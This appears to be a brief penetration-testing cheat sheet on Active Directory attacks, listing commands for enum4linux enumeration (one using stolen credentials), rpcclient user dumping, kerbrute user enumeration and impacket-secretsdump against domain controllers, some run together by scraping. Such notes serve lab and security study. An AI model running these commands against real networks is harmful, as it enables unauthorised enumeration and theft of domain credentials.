Active Directory
Attack Workflow
enum4linux
rpcclient
Password Spraying
Kerberos
Kerberoasting
secretsdump

Last updated

Last updated
enum4linux -a 10.1.1.10 # Attempts to enumerate everything at target
enum4linux -u administrator -p password -U 10.1.1.10 # Use stolen creds to enumerate all users
enum4linux -S 10.1.1.10 # Attempt to gather SMB sharesrpcclient -U 'GOBLINS\printerldap%SecurePassword1' 10.0.0.1 -c 'enumdomusers;exit' | awk -F '[' '{print $2}' | awk -F ']' '{print $1}' > goblinUsers.txt./kerbrute_linux_amd64 userenum --dc 10.10.107.154 -d spookysec.local ../userlist.txtimpacket-secretsdump -just-dc backup:[email protected]